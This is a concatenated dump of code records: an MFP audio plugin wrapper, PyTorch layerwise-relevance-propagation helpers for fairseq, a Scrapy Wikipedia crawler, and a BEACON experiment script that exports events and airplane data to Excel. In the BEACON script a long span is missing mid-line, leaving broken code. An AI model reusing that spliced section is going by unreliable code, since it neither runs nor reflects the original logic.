MFPApp().pluginfo.LADSPA_PORT_INPUT:\n 
self.doc_tooltip_inlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_inlets.extend([self.plug_inlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.inlet_map[self.plug_inlets] = portnum\n self.plug_inlets += 1\n\n elif d & MFPApp().pluginfo.LADSPA_PORT_OUTPUT:\n self.doc_tooltip_outlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_outlets.extend([self.plug_outlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.plug_outlets += 1\n\n async def trigger(self):\n for portnum, value in enumerate(self.inlets):\n if value is not Uninit:\n self.plug_control[self.inlet_map.get(portnum, 0)] = float(value)\n await self.dsp_setparam(\"plug_control\", self.plug_control)\n\n\ndef register():\n MFPApp().register(\"plugin~\", Plugin)\n","repo_name":"bgribble/mfp","sub_path":"mfp/builtins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"32"} +{"seq_id":"22672714018","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom typing import Any, Tuple\nimport torch.autograd as autograd\nfrom torch.nn import ModuleList, ModuleDict\n\n\ndef batch_jacobian(func, input: torch.Tensor):\n assert len(input.size()) == 2\n return torch.stack([autograd.functional.jacobian(func, t) for t in input])\n\n\ndef tuple_jacobian(func, inputs: Tuple[torch.Tensor], batch_dim=0):\n # only support batch_size = 1\n return autograd.functional.jacobian(func, inputs) # out_dims , input_dims\n\n\ndef batch_diag(t: torch.Tensor):\n batch_size, hid_size = t.size()\n diag_t = torch.zeros((batch_size, hid_size, hid_size)).to(t)\n diag_t.as_strided(t.size(), [diag_t.stride(0), diag_t.size(2) + 1,],).copy_(t)\n return diag_t\n\n\ndef batch_diag_value(v: torch.Tensor, m_size):\n assert len(v.size()) == 1\n batch_size = v.size(0)\n # print(v)\n diag_t = torch.zeros((batch_size, m_size, m_size)).to(v)\n diag_t = (diag_t + torch.eye(m_size).to(device=v.device)[None]) * v[:, None, None]\n # index = torch.arange(0,m_size, device=v.device)\n # diag_t[:,index,index] = v\n return diag_t\n\n\nclass LRP:\n \"\"\" Helper class for layerwise relevance propagation \"\"\"\n\n alpha = 1.0\n beta = 0.0\n eps = 1e-10\n use_alpha_beta = True # if False, uses simplified LRP rule: R_i = R_j * z_ji / ( z_j + eps * sign(z_j) )\n consider_attn_constant = (\n False # used by MultiHeadAttn, considers gradient w.r.t q/k zeros\n )\n norm_dim = 1\n\n @classmethod\n def relprop(\n cls,\n function,\n out_relevance,\n inputs: Tuple[torch.Tensor],\n reference_inputs=None,\n reference_output=None,\n jacobians=None,\n batch_dim=0,\n ):\n \"\"\"\n computes input relevance given output_relevance using z+ rule\n works for linear layers, convolutions, poolings, etc.\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n :param function: forward function\n :param output_relevance: relevance w.r.t. 
layer output\n :param inps: a list of layer inputs\n :param reference_inputs: \\hat x, default values used to evaluate bias relevance.\n If specified, must be a tuple/list of tensors of the same shape as inps, default = all zeros.\n :param reference_output: optional pre-computed function(*reference_inputs) to speed up computation\n :param jacobians: optional pre-computed jacobians to speed up computation, same as jacobians(function(*inps), inps)\n\n \"\"\"\n assert len(inputs) > 0, \"please provide at least one input\"\n\n alpha, beta, eps = cls.alpha, cls.beta, cls.eps\n\n reference_inputs = reference_inputs or [\n torch.zeros_like(input).to(input) for input in inputs\n ]\n assert len(reference_inputs) == len(inputs)\n\n output = function(*inputs)\n reference_output = (\n reference_output\n if reference_output is not None\n else function(*reference_inputs)\n )\n assert isinstance(output, torch.Tensor) and isinstance(\n reference_output, torch.Tensor\n )\n assert out_relevance.size() == output.size()\n\n flat_out_relevance = out_relevance.view(-1)\n output_size = flat_out_relevance.size(0)\n\n # 1. compute jacobian w.r.t. all inputs\n jacobians = (\n jacobians if jacobians is not None else tuple_jacobian(function, inputs)\n )\n # ^-- list of [*output_dims, *input_dims] for each input\n assert len(jacobians) == len(inputs)\n\n jac_flat_components = [jac.view(output_size, -1) for jac in jacobians]\n # ^-- list of [output_size, input_size] for each input\n flat_jacobian = torch.cat(\n jac_flat_components, dim=-1\n ) # [output_size, combined_input_size]\n\n # 2. multiply jacobian by input to get unnormalized relevances, add bias\n\n flat_input = torch.cat(\n [input.view(-1) for input in inputs], dim=-1\n ) # [combined_input_size]\n flat_reference_input = torch.cat(\n [ref_input.view(-1) for ref_input in reference_inputs], dim=-1\n ) # [combined_input_size]\n batch_size = output.size(batch_dim)\n input_size_per_sample = flat_input.size(0) // batch_size\n flat_bias_impact = reference_output.view(-1) / input_size_per_sample\n\n flat_impact = (\n flat_bias_impact[:, None]\n + flat_jacobian * (flat_input - flat_reference_input)[None, :]\n )\n\n # ^-- [output_size, combined_input_size], aka z_{j<-i}\n\n if cls.use_alpha_beta:\n # 3. normalize positive and negative relevance separately and add them with coefficients\n flat_positive_impact = torch.maximum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_positive_normalizer = (\n torch.sum(flat_positive_impact, dim=cls.norm_dim, keepdim=True) + eps\n )\n flat_positive_relevance = flat_positive_impact / flat_positive_normalizer\n\n flat_negative_impact = torch.minimum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_negative_normalizer = (\n torch.sum(flat_negative_impact, dim=cls.norm_dim, keepdim=True) - eps\n )\n flat_negative_relevance = flat_negative_impact / flat_negative_normalizer\n flat_total_relevance_transition = (\n alpha * flat_positive_relevance + beta * flat_negative_relevance\n )\n else:\n raise NotImplemented()\n # flat_impact_normalizer = tf.reduce_sum(flat_impact, axis=cls.norm_axis, keep_dims=True)\n # flat_impact_normalizer += eps * (1. - 2. * tf.to_float(tf.less(flat_impact_normalizer, 0)))\n # flat_total_relevance_transition = flat_impact / flat_impact_normalizer\n # note: we do not use tf.sign(z) * eps because tf.sign(0) = 0, so zeros will not go away\n\n flat_in_relevance = torch.einsum(\n \"o,oi\", flat_out_relevance, flat_total_relevance_transition\n )\n # ^-- [combined_input_size]\n\n # 5. 
unpack flat_inp_relevance back into individual tensors\n in_relevances = []\n offset = 0\n for input in inputs:\n input_size = input.view(-1).size(0)\n inp_relevance = flat_in_relevance[offset : offset + input_size].view_as(\n input\n )\n in_relevances.append(inp_relevance)\n offset = offset + input_size\n\n return cls.rescale(out_relevance, in_relevances, batch_dim=batch_dim)\n\n @classmethod\n def rescale(\n cls,\n out_relevance: torch.Tensor,\n in_relevances: Tuple[torch.Tensor],\n batch_dim=None,\n ):\n # assert isinstance(batch_axes, (tuple, list))\n sum_dims = tuple(\n i\n for i in range(len(in_relevances[0].size()))\n if batch_dim is None or i != batch_dim\n )\n ref_scale = out_relevance.abs().sum(\n dim=sum_dims, keepdim=True\n ) # batch_size x 1*\n inp_scales = [\n in_relevance.abs().sum(dim=sum_dims, keepdim=True)\n for in_relevance in in_relevances\n ] # list[batch_size x 1*]\n total_inp_scale = sum(inp_scales) + cls.eps # batch_size x 1*\n in_relevances = [\n in_relevance * (ref_scale / total_inp_scale)\n for in_relevance in in_relevances\n ]\n return in_relevances\n\n\nclass LRPWrapper(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n self.store = {}\n\n def record(self, key, value):\n assert key not in self.store or self.store[key] is None\n self.store[key] = value\n\n def get_record(self, key):\n assert key in self.store and self.store[key] is not False\n if key not in self.store:\n return None\n return self.store[key]\n\n def clear_record(self):\n self.store.clear()\n for key, value in self._modules.items():\n if isinstance(value, LRPWrapper):\n value.clear_record()\n elif isinstance(value, ModuleList):\n for module in value:\n if isinstance(module, LRPWrapper):\n module.clear_record()\n elif isinstance(value, ModuleDict):\n for _, module in value.items():\n if isinstance(module, LRPWrapper):\n module.clear_record()\n\n def relprop(self, out_relevance):\n raise NotImplemented()\n\n\nclass AddWrapper(LRPWrapper):\n def __init__(self) -> None:\n super().__init__()\n\n def forward(self, x, y, record=False):\n if record:\n self.record(\"input1\", x)\n self.record(\"input2\", y)\n return x + y\n\n def relprop(self, out_relevance):\n input1 = self.get_record(\"input1\")\n input2 = self.get_record(\"input2\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input1 = input1.view(-1, input1.size(-1))\n flat_input2 = input2.view(-1, input2.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input1[i, None], flat_input2[i, None]),\n jacobians=[\n torch.eye(flat_input1.size(-1)).to(out_relevance)[None, :, None, :],\n torch.eye(flat_input2.size(-1)).to(out_relevance)[None, :, None, :],\n ],\n )\n for i in range(len(flat_input1))\n ]\n\n flat_in_relevance1 = torch.cat([items[0] for items in flat_in_relevance], dim=0)\n flat_in_relevance2 = torch.cat([items[1] for items in flat_in_relevance], dim=0)\n\n # flat_in_relevance1, flat_in_relevanc2 = LRP.relprop(\n # self, flat_out_relevance, (flat_input1, flat_input2)\n # )\n in_relevance1 = flat_in_relevance1.view_as(input1)\n in_relevance2 = flat_in_relevance2.view_as(input2)\n\n return in_relevance1, in_relevance2\n\n\nclass LinearWrapper(LRPWrapper):\n def __init__(self, linear: torch.nn.Module, activation_fn=None) -> None:\n super().__init__()\n self.weight = linear.weight\n self.bias = 
linear.bias\n self.activation_fn = activation_fn\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n x = x.matmul(self.weight.t())\n if self.bias is not None:\n x = x + self.bias\n if self.activation_fn is not None:\n x = self.activation_fn(x)\n return x\n\n def relprop(self, out_relevance):\n\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[self.weight[None, :, None, :]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # if flat_input.size(0) == 1:\n # flat_in_relevance = LRP.relprop(\n # self,\n # flat_out_relevance,\n # (flat_input,),\n # jacobians=[self.weight[None, :, None, :]],\n # )[0]\n # else:\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass LayerNormWrapper(LRPWrapper):\n \"\"\"\n Performs Layer Normalization\n \"\"\"\n\n def __init__(self, layernorm) -> None:\n super().__init__()\n self.weight = layernorm.weight\n self.bias = layernorm.bias\n self.epsilon = layernorm.eps\n self.normalized_shape = layernorm.normalized_shape\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n\n return F.layer_norm(\n x, self.normalized_shape, self.weight, self.bias, self.epsilon\n )\n\n def _jacobian(self, input):\n assert len(input.size()) == 2, \"Please reshape your inputs to [batch, dim]\"\n batch_size = input.size(0)\n hid_size = input.size(1)\n centered_input = input - torch.mean(input, dim=-1, keepdim=True)\n variance = torch.var(centered_input, dim=-1, unbiased=False, keepdim=True)\n invstd_factor = torch.rsqrt(variance)\n\n # note: the code below will compute jacobian without taking self.scale into account until the _last_ line\n # jac_out_wrt_invstd_factor = centered_input\n jac_out_wrt_variance = -0.5 * (variance + self.epsilon) ** (-1.5)\n\n jac_out_wrt_squared_difference = jac_out_wrt_variance / hid_size\n\n jac_out_wrt_centered_input = (\n batch_diag_value(invstd_factor[:, 0], hid_size)\n + jac_out_wrt_squared_difference[:, :, None]\n * 2\n * centered_input[:, None, :]\n * centered_input[:, :, None]\n )\n\n # jac_out_wrt_input = torch.matmul(\n # jac_out_wrt_centered_input,\n # (\n # torch.eye(hid_size).to(input)\n # - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n # ),\n # )\n jac_out_wrt_input = torch.matmul(\n jac_out_wrt_centered_input.float(),\n (\n torch.eye(hid_size).to(input)\n - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n ).float(),\n )\n return jac_out_wrt_input.half() # batch x hid_size x hid_size\n # return jac_out_wrt_input # batch x hid_size x hid_size\n\n def relprop(self, out_relevance):\n \"\"\"\n computes input relevance given output_relevance\n :param output_relevance: relevance w.r.t. 
layer output, [*dims, out_size]\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n \"\"\"\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n jacobians = self._jacobian(flat_input)\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[jacobians[i, None]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass FFNWrapper(LRPWrapper):\n \"\"\"\n Feed-forward layer\n \"\"\"\n\n def __init__(self, linear_in: LinearWrapper, linear_out: LinearWrapper):\n super().__init__()\n self.linear_in = linear_in\n self.linear_out = linear_out\n\n def forward(self, x, record=False):\n x = self.linear_in(x, record=record)\n x = self.linear_out(x, record=record)\n return x\n\n def relprop(self, out_relevance):\n mid_relevance = self.linear_out.relprop(out_relevance)\n in_relevance = self.linear_in.relprop(mid_relevance)\n return in_relevance\n\n","repo_name":"DoubleVII/my-fairseq","sub_path":"fairseq/models/transformer_lrp/lrp_utils.py","file_name":"lrp_utils.py","file_ext":"py","file_size_in_byte":15853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9233882995","text":"from ..preProcess import preProcessStr, normalizeStr\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass WikiSpiderSpider(CrawlSpider):\n name = \"wiki_spider\"\n allowed_domains = [\"en.wikipedia.org\"]\n\n start_urls = [\n \"https://en.wikipedia.org/wiki/List_of_Marvel_Cinematic_Universe_films\"\n ]\n\n allow_urls = [r\"wiki/\"]\n deny_urls = [\n r\"wiki/Main_Page\",\n r\"wiki/Category:\",\n r\"wiki/Help:\",\n r\"wiki/ISO\",\n r\"wiki/Portal:\",\n r\"wiki/Special:\",\n r\"wiki/Talk:\",\n r\"wiki/Template:\",\n r\"wiki/Template_talk:\",\n r\"wiki/User_talk:\",\n r\"wiki/Wikipedia:\",\n r\"wiki/Wikipedia_talk:\",\n ]\n rules = (\n Rule(\n LinkExtractor(allow=allow_urls, deny=deny_urls),\n callback=\"parse_item\",\n follow=True,\n ),\n )\n\n N = 15000\n count = 0\n\n def parse_item(self, response):\n if self.count >= self.N:\n raise CloseSpider(f\"Scraped {self.N} items. 
Eject!\")\n\n self.count += 1\n\n data = {}\n data[\"page_url\"] = response.url\n\n data[\"page_title\"] = \"\".join(\n response.xpath(\n '//*[@id=\"firstHeading\"]/descendant-or-self::*/text()'\n ).getall()\n )\n\n maxDescriptionLen = 157\n description = \"\"\n totalP = int(float(response.xpath(\"count(/descendant::p)\").get()))\n numP = 0\n while len(description) < maxDescriptionLen and numP < totalP:\n description += normalizeStr(\n \" \".join(\n response.xpath(\n f\"/descendant::p[{numP}]/descendant-or-self::*/text()\"\n ).getall()\n )\n )\n numP += 1\n\n description = normalizeStr(description).strip()\n data[\"page_description\"] = (\n (description[:maxDescriptionLen] + \"...\")\n if len(description) > maxDescriptionLen\n else description\n )\n\n data[\"page_content\"] = preProcessStr(\n \" \".join(response.xpath(\"//p/descendant-or-self::*/text()\").getall())\n )\n\n headings = {}\n for i in range(2, 7):\n head_val = preProcessStr(\n \" \".join(\n response.xpath(f\"//h{i}/descendant-or-self::*/text()\").getall()\n )\n )\n if head_val:\n headings[f\"h{i}\"] = head_val\n\n data |= headings\n\n info_card = {}\n rows = response.xpath(\n '//*[@id=\"mw-content-text\"]/div[1]/table[contains(@class, \"infobox\")]/tbody/tr'\n )\n for row in rows:\n if row.xpath('./th[@class=\"infobox-above summary\"]'):\n continue\n\n img_box = row.xpath(\n './td[@class=\"infobox-image\"]/a[@class=\"image\"]/img/@src'\n )\n if img_box:\n info_card[\"img_url\"] = img_box.get()\n continue\n\n label_box = row.xpath('./th[@class=\"infobox-label\"]')\n if label_box:\n key = preProcessStr(\n \" \".join(\n label_box.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if not key:\n continue\n\n label_data = row.xpath('./td[@class=\"infobox-data\"]')\n if label_data:\n value = preProcessStr(\n \" \".join(\n label_data.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if value:\n info_card[key] = value\n\n data |= info_card\n\n # Invoking the shell from spiders to inspect responses\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n return data\n","repo_name":"Smile040501/Search-Engine","sub_path":"wiki_crawler/wiki_crawler/spiders/wiki_spider.py","file_name":"wiki_spider.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43480665729","text":"#!/usr/bin/env python3\n'''\nThis will add to the functionality of flipbook_reader.py and take any eventids_dict and try to collate the information\nfor the contained events into an excel file for easy note taking and viewing. It attempts to add airplane information\nand thus should be run with code that has pandas version >= 1.4.0. This version is also necessary for the used\n\"overlay\" function when writing to excel. 
\n'''\n\nimport sys\nimport os\nimport inspect\nimport h5py\nimport copy\nfrom pprint import pprint\n\nimport numpy\nimport scipy\nimport scipy.signal\nimport time\nimport pandas as pd\n\n#from beaconroot.examples.beacon_data_reader import Reader #Must be imported before matplotlib or else plots don't load.\nfrom beacon.tools.sine_subtract_cache import sineSubtractedReader as Reader\nfrom beacon.tools.data_handler import createFile\nfrom beacon.tools.fftmath import TemplateCompareTool\nfrom beacon.tools.fftmath import FFTPrepper\nfrom beacon.tools.correlator import Correlator\nfrom beacon.tools.data_slicer import dataSlicer\nfrom beacon.tools.flipbook_reader import flipbookToDict, concatenateFlipbookToDict, concatenateFlipbookToArray, concatenateEventDictToArray\nimport beacon.tools.get_plane_tracks as pt\nfrom tools.airplane_traffic_loader import getDataFrames, getFileNamesFromTimestamps\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom matplotlib import cm, ticker\nfrom matplotlib.patches import Rectangle\nplt.ion()\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings(\"ignore\")\n\nraw_datapath = os.environ['BEACON_DATA']\n#processed_datapath = os.path.join(os.environ['BEACON_PROCESSED_DATA'],'backup_pre_all_map_run_12-5-2021')\nprocessed_datapath = os.environ['BEACON_PROCESSED_DATA']\nprint('SETTING processed_datapath TO: ', processed_datapath)\n\ndef enu2Spherical(enu):\n '''\n 2d array like ((e_0, n_0, u_0), (e_1, n_1, u_1), ... , (e_i, n_i, u_i))\n\n Return in degrees\n '''\n r = numpy.linalg.norm(enu, axis=1)\n theta = numpy.degrees(numpy.arccos(enu[:,2]/r))\n phi = numpy.degrees(numpy.arctan2(enu[:,1],enu[:,0]))\n # import pdb; pdb.set_trace()\n return numpy.vstack((r,phi,theta)).T\n\n\ndef writeEventDictionaryToDataFrame(initial_eventids_dict, ds=None, include_airplanes=True):\n try:\n data_keys = [\n 'calibrated_trigtime',\n 'phi_best_choice',\n 'elevation_best_choice',\n 'cr_template_search_h',\n 'cr_template_search_v',\n 'cr_template_search_hSLICERMAXcr_template_search_v',\n 'hpol_peak_to_sidelobe',\n 'vpol_peak_to_sidelobe',\n 'hpol_peak_to_sidelobeSLICERMAXvpol_peak_to_sidelobe',\n 'hpol_normalized_map_value',\n 'vpol_normalized_map_value',\n 'above_normalized_map_max_line',\n 'above_snr_line',\n 'impulsivity_h',\n 'impulsivity_v',\n 'impulsivity_hSLICERADDimpulsivity_v',\n 'similarity_count_h',\n 'similarity_count_v',\n 'p2p_gap_h',\n 'p2p_gap_v',\n 'csnr_h',\n 'csnr_v',\n 'snr_h',\n 'snr_v',\n 'p2p_h',\n 'p2p_v',\n 'std_h',\n 'std_v',\n 'filtered_std_h',\n 'filtered_std_v',\n 'filtered_snr_h',\n 'filtered_snr_v',\n 'filtered_p2p_h',\n 'filtered_p2p_v',\n 'filtered_p2p_gap_h',\n 'filtered_p2p_gap_v',\n 'filtered_csnr_h',\n 'filtered_csnr_v']\n\n if numpy.all([numpy.issubdtype(k, numpy.integer) for k in initial_eventids_dict.keys()]) or numpy.all(numpy.array(list(initial_eventids_dict.keys()))%1 == 0):\n print('Assuming passed \"initial_eventids_dict\" as eventids_dict format')\n eventids_dict = copy.deepcopy(initial_eventids_dict)\n eventids_array = concatenateEventDictToArray(initial_eventids_dict)\n else:\n print('Assuming passed \"initial_eventids_dict\" as flipbook format')\n eventids_dict = concatenateFlipbookToDict(initial_eventids_dict)\n eventids_array = concatenateFlipbookToArray(initial_eventids_dict)\n\n runs = list(eventids_dict.keys())\n\n force_fit_order = 3 #None to use varying order\n\n # outpath = './airplane_event_flipbook_%i'%time.time() \n # 
os.mkdir(outpath)\n\n\n if ds is None:\n print(\"Preparing dataSlicer\")\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_16384-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, analysis_data_dir=processed_datapath, verbose_setup=False)\n ds.prepareCorrelator()\n else:\n print('Using passed dataSlicer')\n\n status = numpy.zeros(len(eventids_array), dtype=str)\n\n data = { \n 'run' : eventids_array['run'],\n 'eventid' : eventids_array['eventid'],\n 'key' : eventids_array['key'],\n }\n\n monutau_links = []\n for eid in eventids_array:\n eventid = eid['eventid']\n run = eid['run']\n url = \"https://users.rcc.uchicago.edu/~cozzyd/monutau/#event&run=%i&entry=%i\"%(run,eventid)\n monutau_links.append('=HYPERLINK(\"%s\", \"link\")'%url)\n\n data['monutau'] = numpy.asarray(monutau_links)\n data['notes'] = [numpy.nan]*len(eventids_array)\n\n for key in data_keys:\n d = ds.getDataArrayFromParam(key, trigger_types=None, eventids_dict=copy.deepcopy(eventids_dict))\n data[key] = d\n\n if include_airplanes == True:\n print('Calculating airplane information')\n ds.prepareCorrelator()\n time_window_s = 5*60\n plot_distance_cut_limit = 500\n min_approach_cut_km = 1e6\n origin = ds.cor.A0_latlonel_hpol\n\n elevation_best_choice = ds.getDataFromParam(eventids_dict, 'elevation_best_choice')\n phi_best_choice = ds.getDataFromParam(eventids_dict, 'phi_best_choice')\n\n all_minimum_approach = numpy.zeros(len(eventids_array), dtype=float)\n all_event_times = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_r = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_t = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_rpt_at_event_time = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_r = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_airplane = numpy.zeros(len(eventids_array), dtype='= 1 and int(pd.__version__.split('.')[1]) >= 4:\n # flipbook_path = '/home/dsouthall/scratch-midway2/event_flipbook_1643154940'#'/home/dsouthall/scratch-midway2/event_flipbook_1642725413'\n # flipbook_path = './airplane_event_flipbook_1643947072'\n flawed_runs = numpy.array([6537,6538,6539]) #numpy.array([5775,5981,5993,6033,6090,6520,6537,6538,6539]) \n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','sept2021-week1-analysis','hand-scanned-event-info.xlsx')\n # include_airplanes = False\n for include_airplanes in [False, True]:\n #['/home/dsouthall/scratch-midway2/event_flipbook_1643154940', './airplane_event_flipbook_1643947072']\n for flipbook_path in ['./september-flipbook']:\n sorted_dict = flipbookToDict(flipbook_path, 
ignore_runs=flawed_runs)\n if True:\n sheetname = os.path.split(flipbook_path)[-1] + '_airplanes-included-%s'%str(include_airplanes)\n else:\n sheetname = 'raw_airplanes-included-%s'%str(include_airplanes)\n\n df = writeEventDictionaryToDataFrame(sorted_dict, include_airplanes=include_airplanes)\n writeDataFrameToExcel(df, filename, sheetname)\n # writeEventDictionaryToExcel(sorted_dict, filename, ds=None)\n else:\n print('This script requires pandas version >= 1.4.0')\n else:\n cmap = 'cool'#'coolwarm'\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_length = 16384\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_%i-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'%map_length\n \n run_batches = {}\n run_batches['batch_0'] = numpy.arange(5733,5974) # September data, should setup to auto add info to the \"notes\" section based off of existing sorting, and run this one those events for consistency\n run_batches['batch_1'] = numpy.arange(5974,6073)\n run_batches['batch_2'] = numpy.arange(6074,6173)\n run_batches['batch_3'] = numpy.arange(6174,6273)\n run_batches['batch_4'] = numpy.arange(6274,6373)\n run_batches['batch_5'] = numpy.arange(6374,6473)\n run_batches['batch_6'] = numpy.arange(6474,6573)\n run_batches['batch_7'] = numpy.arange(6574,6641)\n runs = numpy.array([])\n for k in (run_batches.keys()):\n runs = numpy.append(runs,run_batches[k])\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, \\\n low_ram_mode=True,\\\n analysis_data_dir=processed_datapath, trigger_types=[2], remove_incomplete_runs=True)\n\n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','paper', 'data','new-cut-event-info.xlsx')\n new_cut_dict = numpy.load( os.path.join( '/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/cuts_run5733-run6640_1652152119' , 'pass_all_cuts_eventids_dict.npy') , allow_pickle=True)[()]\n \n df = writeEventDictionaryToDataFrame(new_cut_dict, include_airplanes=False, ds=ds)\n writeDataFrameToExcel(df, filename, 'passing all cuts')\n\n old_cut_dicts = {}\n for i in range(8):\n f = os.path.join('/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/eventid_dicts', 'stage_2_eventids_dict_batch_%i.npy'%i)\n out = numpy.load( f , allow_pickle=True)[()]\n for run in list(out.keys()):\n old_cut_dicts[run] = out[run]\n\n\n new_cut_array = ds.organizeEventDict(new_cut_dict)\n old_cut_array = ds.organizeEventDict(old_cut_dicts)\n\n matching = ds.organizeEventDict(ds.returnCommonEvents(new_cut_dict, old_cut_dicts))\n matching_dict = ds.returnCommonEvents(new_cut_dict, old_cut_dicts)\n \n events_in_new_not_old = ds.organizeEventDict(ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts))\n events_in_new_not_old_dict = ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts)\n\n\n matching_df = df[numpy.logical_and(numpy.isin(df['run'], matching['run']), numpy.isin(df['eventid'], matching['eventid']))]\n writeDataFrameToExcel(matching_df, filename, 'in old')\n\n new_events_df = df[numpy.logical_and(numpy.isin(df['run'], events_in_new_not_old['run']), 
